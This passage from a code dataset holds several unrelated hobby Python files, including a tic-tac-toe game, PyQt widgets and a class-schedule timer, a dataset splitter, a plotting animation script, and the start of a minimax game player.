print(\"Course Added to Student Successfully\")\r\n else:\r\n print(\"Student Not Found\")\r\n\r\n elif selection == 6:\r\n # TODO 16 call a function to exit the program\r\n break\r\n\r\n else:\r\n print(\"Invalid Selection. Please try again.\")\r\n\r\n except ValueError:\r\n print(\"Invalid Input. Please enter a number.\")\r\n\r\n","repo_name":"Abdullah-Talmas/final_project","sub_path":"final_project.py","file_name":"final_project.py","file_ext":"py","file_size_in_byte":5302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5457754841","text":"class TicTacToe:\n def __init__(self):\n self.field = ' ' * 9\n self.dashes = \"---------\"\n # self.coord = ''\n # self.row_list = []\n # self.colum_list = []\n # self.diagonal_list = []\n self.t_t_t = [[self.field[0], self.field[1], self.field[2]], [self.field[3], self.field[4], self.field[5]],\n [self.field[6], self.field[7], self.field[8]]]\n self.moves = 0\n\n # def check(self, list_):\n # for i in range(3):\n # if list_[i][0] == list_[i][1] == list_[i][2]:\n # if list_[i][0] != ' ':\n # self.row_list.append(list_[0][i])\n # return self.row_list\n # if list_[0][i] == list_[1][i] == list_[2][i]:\n # if list_[0][i] != ' ':\n # self.colum_list.append(list_[0][i])\n # return self.colum_list\n # if list_[0][0] == list_[1][1] == list_[2][2] or list_[2][0] == list_[1][1] == list_[0][2]:\n # if list_[1][1] != ' ':\n # self.diagonal_list.append(list_[1][1])\n # return self.diagonal_list\n def check_row(self, list_):\n new_list = []\n for i in range(3):\n if list_[i][0] == list_[i][1] == list_[i][2]:\n if list_[i][0] != ' ':\n new_list.append(list_[i][0]) # the symbol that fills this row\n return new_list\n\n def check_column(self, list_):\n new_list = []\n for i in range(3):\n if list_[0][i] == list_[1][i] == list_[2][i]:\n if list_[0][i] != ' ':\n new_list.append(list_[0][i])\n return new_list\n\n def check_diagonal(self, list_):\n new_list = []\n if list_[0][0] == list_[1][1] == list_[2][2] or list_[2][0] == list_[1][1] == list_[0][2]:\n if list_[1][1] != ' ':\n new_list.append(list_[1][1])\n return new_list\n\n def menu(self):\n print(self.dashes)\n print('|', self.t_t_t[0][0], self.t_t_t[0][1], self.t_t_t[0][2], '|')\n print('|', self.t_t_t[1][0], self.t_t_t[1][1], self.t_t_t[1][2], '|')\n print('|', self.t_t_t[2][0], self.t_t_t[2][1], self.t_t_t[2][2], '|')\n print(self.dashes)\n\n def win_condition(self):\n\n self.winner = self.check_column(self.t_t_t) + self.check_row(self.t_t_t) + self.check_diagonal(self.t_t_t)\n self.menu()\n\n while True:\n self.winner = self.check_column(self.t_t_t) + self.check_row(self.t_t_t) + self.check_diagonal(self.t_t_t)\n\n coords = input('Enter the coordinates: ')\n x, y = coords.split()\n if not (x.isdigit() and y.isdigit()):\n print('You should enter numbers!')\n continue\n if int(x) not in range(1, 4) or int(y) not in range(1, 4):\n print('Coordinates should be from 1 to 3!')\n continue\n y = int(y) - 1\n x = int(x) - 1\n if self.t_t_t[x][y] == ' ' and self.moves % 2 == 0:\n self.t_t_t[x][y] = 'X'\n self.moves += 1\n # keep the flat field string and the winner lists in sync with the move just made\n self.field = ''.join(self.t_t_t[0] + self.t_t_t[1] + self.t_t_t[2])\n self.winner = self.check_column(self.t_t_t) + self.check_row(self.t_t_t) + self.check_diagonal(self.t_t_t)\n self.menu()\n\n if abs(self.field.count('X') - self.field.count('O')) > 1:\n print('Impossible')\n break\n elif len(self.winner) > 1:\n print('Impossible')\n break\n\n elif len(self.winner) == 0 and ' ' not in self.field:\n print('Draw')\n break\n elif self.winner:\n print(f'{self.winner[0]} wins')\n break\n elif self.t_t_t[x][y] == ' ' and self.moves % 2 == 1:\n self.t_t_t[x][y] = 'O'\n self.moves += 1\n self.field = ''.join(self.t_t_t[0] + self.t_t_t[1] + self.t_t_t[2])\n self.winner = self.check_column(self.t_t_t) + self.check_row(self.t_t_t) + self.check_diagonal(self.t_t_t)\n self.menu()\n\n if abs(self.field.count('X') - 
self.field.count('O')) > 1:\n print('Impossible')\n break\n elif len(self.winner) > 1:\n print('Impossible')\n break\n\n elif len(self.winner) == 0 and ' ' not in self.field:\n print('Draw')\n break\n elif self.winner:\n print(f'{self.winner[0]} wins')\n break\n else:\n print('This cell is occupied! Choose another one!')\n\n\n def main(self):\n\n self.win_condition()\n\n\n\nTicTacToe().main()\n","repo_name":"LegendaryVasya/Tic-Tac-Toe","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33255189954","text":"from PyQt6.QtGui import QColor\nfrom PyQt6.QtWidgets import QComboBox\n\nfrom view.worktop import GridScrollBar\n\n\nclass ComboBox(QComboBox):\n\n def __init__(self, parent = None) -> None:\n super().__init__(parent=parent)\n self.setStyleSheet(\"\"\"\n QComboBox {\n padding: 1px 5px 5px 2px;\n border: 2px solid #545454;\n }\n QComboBox QAbstractItemView {\n outline: 0;\n }\n QComboBox QAbstractItemView::item {\n height: 20px; \n }\n QComboBox QAbstractItemView::item:selected {\n background-color: #363636;\n border: none;\n }\n \"\"\")\n self.view().setVerticalScrollBar(GridScrollBar(vertical_color=QColor(\"#bfbfbf\")))\n self.view().setHorizontalScrollBar(GridScrollBar(vertical_color=QColor(\"#bfbfbf\")))\n\n def setCurrentText(self, text: str) -> None:\n if text is None:\n text = \"\"\n super().setCurrentText(text)","repo_name":"rodusek-v/gui-tad","sub_path":"gui/view/fields/combo_box.py","file_name":"combo_box.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71077883573","text":"import logging\nfrom typing import Dict\n\n\ndef dataset_splitter_by_time(\n dataset: list,\n dev_size: float,\n test_size: float,\n train_size: float,\n parts: int\n) -> Dict[str, list]:\n assert dev_size + test_size + train_size == 1.0, 'Dev + Test + Train must be equal to 1.0'\n\n dev_divided = dev_size / parts\n test_divided = test_size / parts\n train_divided = train_size / parts\n\n divisions = {\n 'dev': [],\n 'test': [],\n 'train': []\n }\n\n counter = 0\n for i in range(parts):\n start_pos = counter\n end_pos = round(len(dataset) * train_divided) + start_pos\n divisions['train'] += [dataset[item] for item in range(start_pos, end_pos)]\n counter = end_pos\n logging.debug('#{} Adding to train from: {} to {}'.format(str(i), str(start_pos), str(end_pos)))\n\n start_pos = counter\n end_pos = round(len(dataset) * test_divided) + start_pos\n divisions['test'] += [dataset[item] for item in range(start_pos, end_pos)]\n counter = end_pos\n logging.debug('#{} Adding to test from: {} to {}'.format(str(i), str(start_pos), str(end_pos)))\n\n start_pos = counter\n end_pos = round(len(dataset) * dev_divided) + start_pos\n divisions['dev'] += [dataset[item] for item in range(start_pos, end_pos)]\n counter = end_pos\n logging.debug('#{} Adding to dev from: {} to {}'.format(str(i), str(start_pos), str(end_pos)))\n\n start_pos = counter\n end_pos = len(dataset) - len(divisions['dev']) - len(divisions['test']) - len(divisions['train'])\n if end_pos > 0:\n divisions['train'] += [dataset[item] for item in range(start_pos, len(dataset))]\n logging.debug('Adding missing samples to train from: {} to {}'.format(str(start_pos), str(end_pos)))\n\n return divisions\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s - %(message)s',\n 
datefmt='%Y-%m-%d %H:%M:%S')\n\n divisions = dataset_splitter_by_time(list(range(34290)), 0.1, 0.2, 0.7, 4)\n print(len(divisions['dev']), len(divisions['test']), len(divisions['train']))\n","repo_name":"BMarcin/PetraRQ","sub_path":"src/DatasetSplitter/DatasetSplitter.py","file_name":"DatasetSplitter.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28377038959","text":"import json\nimport webbrowser as wb\nimport time\nimport pyperclip as pc\nimport datetime\nfrom datetime import datetime\nfrom PyQt5 import QtCore, QtWidgets, QtGui\nimport threading\nimport sys\nimport os\n\n\ndef dayDefiner(day):\n if day == 0:\n return \"Monday\"\n elif day == 1:\n return \"Tuesday\"\n elif day == 2:\n return \"Wednesday\"\n elif day == 3:\n return \"Thursday\"\n elif day == 4:\n return \"Friday\"\n elif day == 5:\n return \"Saturday\"\n elif day == 6:\n return \"Sunday\"\n else:\n return \"Not Defined\"\n\n\nclass mainWindowUi(object):\n def __init__(self, mainWindow):\n mainWindow.setObjectName(\"MainWindow\")\n mainWindow.resize(531, 331)\n mainWindow.setAutoFillBackground(False)\n mainWindow.setStyleSheet(\"background-color: #343233;\")\n\n # setting Up the Central QtWidgets\n self.centralWidget = QtWidgets.QWidget(mainWindow)\n self.centralWidget.setObjectName(\"centralWidget\")\n\n # the vertical Layout Widgets Creation\n self.vlw = QtWidgets.QWidget(self.centralWidget)\n self.vlw.setGeometry(QtCore.QRect(310, 20, 181, 211))\n self.vlw.setObjectName(\"vlw\")\n\n # the vertical Layout Creation\n self.vl = QtWidgets.QVBoxLayout(self.vlw)\n self.vl.setContentsMargins(0, 0, 0, 0)\n self.vl.setObjectName(\"vl\")\n\n # setting up the Fonts\n font = QtGui.QFont()\n font.setFamily(\n \"-apple-system,BlinkMacSystemFont,Segoe UI,Helvetica,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji,\"\n \"Segoe UI Symbol\")\n font.setPointSize(-1)\n font.setBold(False)\n font.setItalic(False)\n font.setWeight(37)\n\n # creating the Label\n self.A1 = QtWidgets.QLabel(self.vlw)\n self.A1.setFont(font)\n\n # styling the 'Today Is Monday' Text\n self.A1.setStyleSheet(\" font: 25px/1.5 normal normal;\\n\"\n \"font-family: -apple-system, BlinkMacSystemFont, \\\"Segoe UI\\\", Helvetica, Arial, \"\n \"sans-serif, \\\"Apple Color Emoji\\\", \\\"Segoe UI Emoji\\\", \\\"Segoe UI Symbol\\\";\\n \"\n \" font-weight: 300;\\n\"\n \" color: #efdab9;\\n\"\n \" background-color: #343233;\\n\"\n \"text-align: center;\")\n self.A1.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter)\n self.A1.setObjectName(\"A1\")\n self.vl.addWidget(self.A1)\n\n # creating the clock label\n self.A2 = QtWidgets.QLabel(self.vlw)\n\n # styling the clock label\n self.A2.setStyleSheet(\" font: 25px/1.5 normal normal;\\n\"\n \"font-family: -apple-system, BlinkMacSystemFont, \\\"Segoe UI\\\", Helvetica, Arial, \"\n \"sans-serif, \\\"Apple Color Emoji\\\", \\\"Segoe UI Emoji\\\", \\\"Segoe UI Symbol\\\";\\n \"\n \" font-weight: 300;\\n\"\n \" color: #efdab9;\\n\"\n \" background-color: #343233;\\n\"\n \"text-align: center;\")\n self.A2.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter)\n self.A2.setObjectName(\"A2\")\n self.vl.addWidget(self.A2)\n\n # creating the Editing Button\n self.Edit = QtWidgets.QPushButton(self.vlw)\n\n # styling the Button\n font = QtGui.QFont()\n font.setFamily(\"Helvetica Neue,Helvetica,arial,freesans,clean,sans-serif\")\n font.setPointSize(-1)\n font.setBold(True)\n font.setItalic(False)\n font.setUnderline(False)\n 
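# setWeight() uses Qt 5's 0-99 font-weight scale, so 62 sits just under QFont.DemiBold (63)\n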
font.setWeight(62)\n font.setStrikeOut(False)\n self.Edit.setFont(font)\n self.Edit.setStyleSheet(\"background-color: rgb(253, 219, 58);\\n\"\n \"font: 25px/1.7 normal normal;\\n\"\n \"font-family: \\\"Helvetica Neue\\\", Helvetica, arial, freesans, clean, sans-serif;\\n\"\n \"display: inline-block;\\n\"\n \"padding: .5em 1em;\\n\"\n \"line-height: inherit;\\n\"\n \"font-size: inherit;\\n\"\n \"font-weight: 500;\\n\"\n \"text-decoration: none;\\n\"\n \"border-radius: 5px;\\n\"\n \"color: #343233;\\n\"\n \"background-color: #ffd152;\\n\"\n \"\")\n self.Edit.setObjectName(\"Edit\")\n self.vl.addWidget(self.Edit)\n\n # creating the second vertical Layout Widget\n self.vlw_2 = QtWidgets.QWidget(self.centralWidget)\n self.vlw_2.setGeometry(QtCore.QRect(40, 20, 219, 211))\n self.vlw_2.setObjectName(\"vlw_2\")\n self.vl_2 = QtWidgets.QVBoxLayout(self.vlw_2)\n self.vl_2.setContentsMargins(0, 0, 0, 0)\n self.vl_2.setObjectName(\"vl_2\")\n\n # creating the 'Next lesson is' label\n self.A3 = QtWidgets.QLabel(self.vlw_2)\n\n # styling the label\n font = QtGui.QFont()\n font.setFamily(\n \"-apple-system,BlinkMacSystemFont,Segoe UI,Helvetica,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji,\"\n \"Segoe UI Symbol\")\n font.setPointSize(-1)\n font.setBold(False)\n font.setItalic(False)\n font.setWeight(37)\n self.A3.setFont(font)\n self.A3.setStyleSheet(\" font: 25px/1.5 normal normal;\\n\"\n \"font-family: -apple-system, BlinkMacSystemFont, \\\"Segoe UI\\\", Helvetica, Arial, \"\n \"sans-serif, \\\"Apple Color Emoji\\\", \\\"Segoe UI Emoji\\\", \\\"Segoe UI Symbol\\\";\\n \"\n \" font-weight: 300;\\n\"\n \" color: #efdab9;\\n\"\n \" background-color: #343233;\\n\"\n \"text-align: center;\")\n self.A3.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter)\n self.A3.setObjectName(\"A3\")\n self.vl_2.addWidget(self.A3)\n\n # creating the 'Starts In' label\n self.A4 = QtWidgets.QLabel(self.vlw_2)\n self.A4.setMaximumSize(QtCore.QSize(16777198, 16777215))\n\n # styling the label\n font = QtGui.QFont()\n font.setFamily(\n \"-apple-system,BlinkMacSystemFont,Segoe UI,Helvetica,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji,\"\n \"Segoe UI Symbol\")\n font.setPointSize(-1)\n font.setBold(False)\n font.setItalic(False)\n font.setWeight(37)\n self.A4.setFont(font)\n self.A4.setStyleSheet(\" font: 25px/1.5 normal normal;\\n\"\n \"font-family: -apple-system, BlinkMacSystemFont, \\\"Segoe UI\\\", Helvetica, Arial, \"\n \"sans-serif, \\\"Apple Color Emoji\\\", \\\"Segoe UI Emoji\\\", \\\"Segoe UI Symbol\\\";\\n \"\n \" font-weight: 300;\\n\"\n \" color: #efdab9;\\n\"\n \" background-color: #343233;\\n\"\n \"text-align: center;\")\n self.A4.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter)\n self.A4.setObjectName(\"A4\")\n self.vl_2.addWidget(self.A4)\n\n # creating the (time left) label\n self.timeLeft = QtWidgets.QLabel(self.vlw_2)\n\n # styling the label\n self.timeLeft.setStyleSheet(\" font: 25px/1.5 normal normal;\\n\"\n \"font-family: -apple-system, BlinkMacSystemFont, \\\"Segoe UI\\\", Helvetica, Arial, \"\n \"sans-serif, \\\"Apple Color Emoji\\\", \\\"Segoe UI Emoji\\\", \\\"Segoe UI Symbol\\\";\\n \"\n \" font-weight: 300;\\n\"\n \" color: #efdab9;\\n\"\n \" background-color: #343233;\\n\"\n \"text-align: center;\")\n self.timeLeft.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter)\n self.timeLeft.setObjectName(\"timeLeft\")\n self.vl_2.addWidget(self.timeLeft)\n\n # creating the reminder label\n self.remind = QtWidgets.QLabel(self.centralWidget)\n self.remind.setGeometry(QtCore.QRect(20, 270, 241, 21))\n\n # 
styling the label\n self.remind.setStyleSheet(\" font: 10px/1.5 normal normal;\\n\"\n \"font-family: -apple-system, BlinkMacSystemFont, \\\"Segoe UI\\\", Helvetica, Arial, \"\n \"sans-serif, \\\"Apple Color Emoji\\\", \\\"Segoe UI Emoji\\\", \\\"Segoe UI Symbol\\\";\\n \"\n \" font-weight: 300;\\n\"\n \" color: #efdab9;\\n\"\n \" background-color: #343233;\\n\"\n \"text-align: center;\")\n self.remind.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter)\n self.remind.setObjectName(\"remind\")\n mainWindow.setCentralWidget(self.centralWidget)\n\n # creating the MenuBar\n self.menuBar = QtWidgets.QMenuBar(mainWindow)\n self.menuBar.setGeometry(QtCore.QRect(0, 0, 531, 21))\n self.menuBar.setObjectName(\"menuBar\")\n mainWindow.setMenuBar(self.menuBar)\n\n # creating the StatusBar\n self.statusBar = QtWidgets.QStatusBar(mainWindow)\n self.statusBar.setObjectName(\"statusBar\")\n mainWindow.setStatusBar(self.statusBar)\n\n # calling the translate Ui\n self.translateUi(mainWindow)\n QtCore.QMetaObject.connectSlotsByName(mainWindow)\n\n def translateUi(self, mainWindow):\n _translate = QtCore.QCoreApplication.translate\n mainWindow.setWindowTitle(_translate(\"MainWindow\", \"Timer\"))\n self.A1.setText(_translate(\"MainWindow\", \"Monday\"))\n self.A2.setText(_translate(\"MainWindow\", \"Not Set\"))\n self.Edit.setText(_translate(\"MainWindow\", \"Edit\"))\n self.A3.setText(_translate(\"MainWindow\", \"Next Lesson\"))\n self.A4.setText(_translate(\"MainWindow\", \"Starts\"))\n self.timeLeft.setText(_translate(\"MainWindow\", \"In Few Minutes?\"))\n\n self.Edit.clicked.connect(lambda: os.startfile('C:/Users/himas/PycharmProjects/School.Py/data.json'))\n\n def setTime(self, Time):\n self.A2.setText(Time)\n\n def setDay(self, Day):\n self.A1.setText(f\"{Day}\")\n\n def setNoLeft(self):\n self.A3.setText(\"\")\n self.A4.setText(\"No Lessons :D\")\n self.timeLeft.setText(\"\")\n\n def setTimeLeft(self, Time, Hours):\n now = datetime.now()\n hour = now.strftime(\"%H\")\n minutes = now.strftime(\"%M\")\n if hour[0:1] == '0':\n hour = hour[1:2]\n if minutes[0:1] == '0':\n minutes = minutes[1:2]\n hour = int(hour)\n minutes = int(minutes)\n\n if Hours == hour and Time > minutes:\n self.A3.setText(\"Next Lesson\")\n self.A4.setText(\"Starts\")\n self.timeLeft.setText(f'in {Time - minutes} Minutes')\n\n elif Time == minutes and Hours == hour:\n self.A3.setText(\"Next Lesson\")\n self.A4.setText(\"Starts\")\n self.timeLeft.setText(\"Right Now\")\n\n elif Hours > hour and Time > minutes:\n self.A3.setText(\"Next Lesson\")\n self.A4.setText(\"Starts\")\n self.timeLeft.setText(f'in {Hours - hour}h and {Time - minutes}m')\n\n elif Hours > hour and Time == minutes:\n self.A3.setText(\"Next Lesson\")\n self.A4.setText(\"Starts\")\n self.timeLeft.setText(f'in {Hours - hour} Hours')\n\n elif Hours == hour + 1 and Time < minutes:\n self.A3.setText(\"Next Lesson\")\n self.A4.setText(\"Starts\")\n self.timeLeft.setText(f'in {abs(Time + 60 - minutes)} Minutes')\n\n elif Hours > hour and Time < minutes:\n self.A3.setText(\"Next Lesson\")\n self.A4.setText(\"Starts\")\n self.timeLeft.setText(f'in {Hours - hour - 1}h and {abs(Time + 60 - minutes)}m')\n\n elif Hours < hour:\n pass\n\n elif Hours == hour and Time < minutes:\n pass\n\n else:\n print(\"Something's Wrong with setTimeLeft()\")\n\n def signIn(self, meetingLink):\n wb.open(meetingLink)\n pc.copy(meetingLink)\n self.A3.setText(\"\")\n self.A4.setText(\"Link Copied!\")\n self.timeLeft.setText(\"\")\n time.sleep(2)\n self.A3.setText(\"Next Lesson\")\n 
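# (the idle labels return here after the two-second \"Link Copied!\" flash above)\n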
self.A4.setText(\"Starts\")\n\n def scheduler(self):\n while True:\n with open('C:/Users/himas/PycharmProjects/School.Py/data.json', 'r') as json_file:\n today = str(datetime.today().weekday())\n data = json.load(json_file)\n now = datetime.now()\n exact_time = str(now.strftime(\"%H:%M\"))\n for i in data['days'][today]:\n if exact_time == i:\n meeting_link = (data['days'][today][exact_time])\n self.signIn(meeting_link)\n time.sleep(60)\n if stop_threads:\n break\n time.sleep(1)\n\n def timerdisplay(self):\n while True:\n now = datetime.now()\n exact_time = str(now.strftime(\"%H:%M:%S\"))\n self.setTime(exact_time)\n time.sleep(1)\n global stop_threads\n if stop_threads:\n break\n\n def timeLeftDefiner(self):\n while True:\n with open('C:/Users/himas/PycharmProjects/School.Py/data.json', 'r') as json_file:\n data = json.load(json_file)\n today = str(datetime.today().weekday())\n now = datetime.now()\n f_lessons = []\n hours = now.strftime(\"%H\")\n minutes = now.strftime(\"%M\")\n if hours[0:1] == '0':\n hours = hours[1:2]\n if minutes[0:1] == '0':\n minutes = minutes[1:2]\n hours = int(hours)\n minutes = int(minutes)\n\n for i in data['days'][today]:\n x_hours = i[0:2]\n x_minutes = i[3:5]\n if x_hours[0:1] == 0:\n x_hours = x_hours[1:2]\n if x_minutes[0:1] == 0:\n x_minutes = x_minutes[1:2]\n x_hours = int(x_hours)\n x_minutes = int(x_minutes)\n\n if x_hours == hours and x_minutes == minutes:\n self.setTimeLeft(0, 0)\n elif x_hours < hours:\n pass\n elif x_hours >= hours:\n if x_hours == hours and x_minutes >= minutes:\n f_lessons.append(i)\n elif x_hours == hours and x_minutes < minutes:\n pass\n elif x_hours > hours:\n f_lessons.append(i)\n else:\n print('Something is wrong in timeLeftDefiner()')\n smallest = f_lessons[0] if f_lessons else None\n for x in f_lessons:\n x_hours = x[0:2]\n x_minutes = x[3:5]\n smallest_hour = smallest[0:2]\n smallest_minute = smallest[3:5]\n if smallest_hour[0:1] == 0:\n smallest_hour = smallest_hour[1:2]\n if smallest_minute[0:1] == 0:\n smallest_minute = smallest_minute[1:2]\n if x_hours[0:1] == 0:\n x_hours = x_hours[1:2]\n if x_minutes[0:1] == 0:\n x_minutes = x_minutes[1:2]\n x_hours = int(x_hours)\n x_minutes = int(x_minutes)\n smallest_hour = int(smallest_hour)\n smallest_minute = int(smallest_minute)\n if x_hours < smallest_hour:\n smallest = x\n elif x_hours == smallest_hour:\n if x_minutes < smallest_minute:\n smallest = x\n else:\n pass\n else:\n pass\n try:\n if not f_lessons:\n self.setNoLeft()\n else:\n final_hour = smallest[0:2]\n final_minute = smallest[3:5]\n if final_hour[0:1] == 0:\n final_hour = final_hour[1:2]\n if final_minute[0:1] == 0:\n final_minute = final_minute[1:2]\n final_hour = int(final_hour)\n final_minute = int(final_minute)\n self.setTimeLeft(final_minute, final_hour)\n except Exception as Ex:\n print(Ex)\n if stop_threads:\n break\n time.sleep(1)\n\n def daySetter(self):\n today = int(datetime.today().weekday())\n day = dayDefiner(today)\n self.setDay(day)\n\n\nif __name__ == '__main__':\n # and here I run everything...\n stop_threads = False\n app = QtWidgets.QApplication(sys.argv)\n app_icon = QtGui.QIcon()\n app_icon.addFile('Bcon.png')\n app.setWindowIcon(app_icon)\n\n MainWindow = QtWidgets.QMainWindow()\n ui = mainWindowUi(MainWindow)\n ui.daySetter()\n timer = threading.Thread(target=ui.timerdisplay)\n timer.start()\n schedul = threading.Thread(target=ui.scheduler)\n schedul.start()\n lefttimer = threading.Thread(target=ui.timeLeftDefiner)\n lefttimer.start()\n MainWindow.show()\n ret = app.exec_()\n stop_threads 
= True\n sys.exit(ret)\n","repo_name":"Hopeful-ly/school.py","sub_path":"main.pyw","file_name":"main.pyw","file_ext":"pyw","file_size_in_byte":17937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13801825585","text":"import discord\n\nfrom bot.settings import DEFAULT_PREFIX\nfrom models.my_orm import MaybeAcquire, Table\n\n\nasync def get_prefix(bot, msg: discord.message.Message):\n if not msg.guild:\n return DEFAULT_PREFIX\n else:\n sql = f\"\"\"\n SELECT bot_prefix FROM guilds WHERE guild_id = {msg.guild.id}\n \"\"\"\n async with MaybeAcquire(connection=None, pool=Table._pool) as con:\n data = await con.fetchrow(sql)\n # data = await DB.sql_fetch(sql, True)\n prefix = data.get('bot_prefix')\n return prefix","repo_name":"zyzycode/monster_bot","sub_path":"utils/get_prefix.py","file_name":"get_prefix.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15341923211","text":"from __future__ import annotations\n\nfrom pathlib import Path\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom matplotlib.animation import FuncAnimation\n\nsns.set(font_scale=2)\n\nSCRIPTS_FOLDER_PATH = Path('..')\nDATA_PATH = SCRIPTS_FOLDER_PATH / 'data' / 'memory_demo'\nINPUT_PATHS = [\n DATA_PATH / 'low_memory_control' / 'cell_output.csv',\n DATA_PATH / 'high_memory_control' / 'cell_output.csv',\n]\nOUTPUT_PATH = SCRIPTS_FOLDER_PATH / 'Video S2' / 'Supplementary Video S2.mp4'\n\n\ndef main(\n input_paths: list[Path],\n output_path: Path,\n) -> None:\n \"\"\"Main function of this script.\"\"\"\n dfs = []\n for path in input_paths:\n df = pd.read_csv(path, index_col=0)\n df['memory'], df['treatment'] = get_info_from_path_name(path=path)\n dfs.append(df)\n data = pd.concat(dfs, ignore_index=True)\n data['$f_m$'] = data['memory'].astype(str)\n fig, (top_ax, bottom_ax) = plt.subplots(figsize=(16, 16), nrows=2)\n grouped_data = (\n data\n .groupby(['$f_m$', 'colony_name', 'simulation_hours'])['signal_value']\n .mean()\n .reset_index()\n .rename(columns={'signal_value': 'colony_signal_mean'})\n )\n grouped_data['colony_signal_variance'] = (\n data\n .groupby(['$f_m$', 'colony_name', 'simulation_hours'])['signal_value']\n .var()\n .reset_index(drop=True)\n )\n grouped_data['colony_size'] = (\n data\n .groupby(['$f_m$', 'colony_name', 'simulation_hours'])['signal_value']\n .count()\n .reset_index(drop=True)\n )\n grouped_data['colony_size_jitter'] = grouped_data['colony_size'] + grouped_data['$f_m$'].apply(\n lambda value: np.random.normal(loc={'0.0': -0.2, '0.9': +0.2}.get(value), scale=0.05)\n )\n max_hours = grouped_data[\"simulation_hours\"].max()\n\n def update(hour: float) -> None:\n \"\"\"Updates the plot.\"\"\"\n print('\\b' * 100, end='')\n print( f'Video is: {round(100 * (hour/max_hours), 1)}% done...', end='')\n hour_data = grouped_data.loc[grouped_data['simulation_hours'] == hour]\n for ax, label in (\n (top_ax, 'mean'),\n (bottom_ax, 'variance')\n ):\n ax.clear()\n sns.scatterplot(\n ax=ax,\n data=hour_data,\n x='colony_size_jitter',\n y=f'colony_signal_{label}',\n hue='$f_m$',\n palette=['#029e73', '#de8f05'],\n )\n ax.set_title(f'Distribution of signal {label} in colonies (N=100 per $f_m$)')\n ax.set_xlabel('Colony size')\n ax.set_xticks([tick for tick in ax.get_xticks() if tick.is_integer()])\n if ax.get_xlim()[-1] < 5:\n ax.set_xlim(right=5)\n ax.set_ylabel(f'Signal {label} in colonies')\n 
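# the y-limits below are pinned so the scale stays steady across frames, since update() clears and redraws both axes on every call\n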
top_ax.set_ylim(-1, 1)\n top_ax.set_yticks([-1, 0, 1])\n bottom_ax.set_ylim(0, 0.7)\n if bottom_ax.get_yticks()[-1] == 0:\n bottom_ax.set_yticks([])\n fig.suptitle(f'Simulation time: {round(hour, 1)} hours')\n fig.tight_layout()\n\n ani = FuncAnimation(fig, update, frames=grouped_data['simulation_hours'].unique())\n ani.save(str(output_path))\n\n\ndef get_info_from_path_name(path: Path) -> tuple[float, str]:\n \"\"\"Returns the memory and treatment based on the Path's words.\"\"\"\n memory = 0.0 if 'low' in path.as_posix().lower() else 0.9\n treatment = 'TMZ' if 'tmz' in path.as_posix().lower() else 'Control'\n return memory, treatment\n\n\nif __name__ == '__main__':\n main(input_paths=INPUT_PATHS, output_path=OUTPUT_PATH)\n","repo_name":"jfaccioni/clovars","sub_path":"scripts/Figures and Videos/Video S2/render_video_S2.py","file_name":"render_video_S2.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13443409812","text":"# -*- coding: utf-8 -*-\n__author__ = 'Sivasubramanian Chandrasegarampillai, Walter Curnow'\n__email__ = 'rchandra@uci.edu,wcurnow@uci.edu'\nimport time\nfrom assignment2 import Player, State, Action\n\n# Yujia Li A98064697\n# Ze Li A11628864\n# Wei Wang A97031723\n\n__author__ = 'yul200@ucsd.edu, zel014@ucsd.edu, wew026@ucsd.edu'\n\nclass YourCustomPlayer(Player):\n @property\n def name(self):\n \"\"\"Returns the name of this agent. Try to make it unique!\"\"\"\n return 'whatever'\n\n def move(self, state):\n \"\"\"Calculates the absolute best move from the given board position using magic.\n \n Args:\n state (State): The current state of the board.\n\n Returns:\n your next Action instance\n \"\"\"\n max_depth = state.M * state.N - sum([1 for row in state.board for cell in row if cell > 0])\n current_depth = 0\n return_state = None\n trans = {}\n while(current_depth <= max_depth):\n return_state = self.min_max(state, current_depth, trans)\n current_depth = current_depth + 1\n return return_state\n\n def feel_like_thinking(self, start_time):\n if time.time() - start_time <= 1:\n return True\n return False\n\n # implement iterative depping alpha beta + heuristic function at depth limit\n # improve the heuristic function\n # add move ordering based on the best moves from previous iteration \n # in iterative deepening\n def do_the_magic(self, state):\n \"\"\"we did not use this function at this time\"\"\"\n\n def min_max(self, state, current_depth, trans):\n trans.clear()\n if current_depth == 0:\n if(state.is_terminal()):\n return state.utility(player)\n return self.evaluate(state, state.to_play.color)\n player = state.to_play\n state_list = state.actions()\n store = []\n a = float(\"-infinity\")\n b = float(\"infinity\")\n for i in range(0, len(state_list)):\n store.insert(i, self.min_value(state.result(state_list[i]),player, a, b, trans, \n current_depth - 1))\n val = float(\"-infinity\")\n for i in range(0, len(store)):\n if store[i] > val: \n val = store[i]\n index = i\n return state_list[index]\n\n def max_value(self, state, player,a,b,trans, current_depth):\n # if terminal test is true, return utility\n # val <- negative infinity\n # for each child in Action do\n # val <- max(val, min_value(child, a, b))\n # if val >= b then return val\n # a <- max(a, val)\n # return val\n if current_depth == 0:\n if(state.is_terminal()): return state.utility(player)\n if state in trans: return trans[state]\n return self.evaluate(state, state.to_play.color) \n if state in trans:\n 
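# transposition-table hit: reuse the value already computed for this state\n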
